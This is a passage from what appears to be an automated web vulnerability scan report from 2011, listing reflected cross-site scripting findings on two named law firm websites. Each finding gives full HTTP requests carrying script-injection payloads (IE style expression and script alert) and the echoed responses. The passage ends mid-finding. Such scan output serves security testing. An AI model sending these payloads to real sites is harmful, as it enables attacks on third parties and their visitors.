Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8e"style%3d"x%3aexpression(alert(1))"ace1f519915 was submitted in the REST URL parameter 3. This input was echoed as acc8e"style="x:expression(alert(1))"ace1f519915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webacc8e"style%3d"x%3aexpression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webacc8e"style="x:expression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg">
...[SNIP]...

4.133. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66197"style%3d"x%3aexpression(alert(1))"8bf47abd841 was submitted in the REST URL parameter 4. This input was echoed as 66197"style="x:expression(alert(1))"8bf47abd841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf66197"style%3d"x%3aexpression(alert(1))"8bf47abd841/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf66197"style="x:expression(alert(1))"8bf47abd841/home_btn_02ov.jpg">
...[SNIP]...

4.134. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7644"style%3d"x%3aexpression(alert(1))"ce851a25267 was submitted in the REST URL parameter 5. This input was echoed as f7644"style="x:expression(alert(1))"ce851a25267 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_02ov.jpgf7644"style%3d"x%3aexpression(alert(1))"ce851a25267 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_02ov.jpgf7644"style="x:expression(alert(1))"ce851a25267">
...[SNIP]...

4.135. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1716"style%3d"x%3aexpression(alert(1))"4084a5490db was submitted in the REST URL parameter 3. This input was echoed as e1716"style="x:expression(alert(1))"4084a5490db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webe1716"style%3d"x%3aexpression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webe1716"style="x:expression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg">
...[SNIP]...

4.136. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a was submitted in the REST URL parameter 4. This input was echoed as ba47c"style="x:expression(alert(1))"c28d4b74f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfba47c"style="x:expression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg">
...[SNIP]...

4.137. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 was submitted in the REST URL parameter 5. This input was echoed as 3a767"style="x:expression(alert(1))"548deb48dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_03ov.jpg3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_03ov.jpg3a767"style="x:expression(alert(1))"548deb48dd4">
...[SNIP]...

4.138. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4 was submitted in the REST URL parameter 3. This input was echoed as 52af3"style="x:expression(alert(1))"cdf88022cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web52af3"style="x:expression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg">
...[SNIP]...

4.139. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de641"style%3d"x%3aexpression(alert(1))"3bc42b14411 was submitted in the REST URL parameter 4. This input was echoed as de641"style="x:expression(alert(1))"3bc42b14411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfde641"style%3d"x%3aexpression(alert(1))"3bc42b14411/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfde641"style="x:expression(alert(1))"3bc42b14411/home_btn_04ov.jpg">
...[SNIP]...

4.140. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ececd"style%3d"x%3aexpression(alert(1))"52b48d08320 was submitted in the REST URL parameter 5. This input was echoed as ececd"style="x:expression(alert(1))"52b48d08320 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_04ov.jpgececd"style%3d"x%3aexpression(alert(1))"52b48d08320 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_04ov.jpgececd"style="x:expression(alert(1))"52b48d08320">
...[SNIP]...

4.141. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01 was submitted in the REST URL parameter 3. This input was echoed as ceaaf"style="x:expression(alert(1))"ff30546ad01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webceaaf"style="x:expression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg">
...[SNIP]...

4.142. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0 was submitted in the REST URL parameter 4. This input was echoed as 8aca7"style="x:expression(alert(1))"f20c4010af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf8aca7"style="x:expression(alert(1))"f20c4010af0/home_btn_05ov.jpg">
...[SNIP]...

4.143. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de was submitted in the REST URL parameter 5. This input was echoed as d22b2"style="x:expression(alert(1))"06ea3ed31de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_05ov.jpgd22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_05ov.jpgd22b2"style="x:expression(alert(1))"06ea3ed31de">
...[SNIP]...

4.144. http://www.hbsr.com/contact_us/index [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/contact_us/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bda6"><script>alert(1)</script>8ad033eb3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index-print">
...[SNIP]...

4.145. http://www.hbsr.com/contact_us/index [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/contact_us/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b5c"><script>alert(1)</script>c3ef65ee739 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739 HTTP/1.1
Host: www.hbsr.com
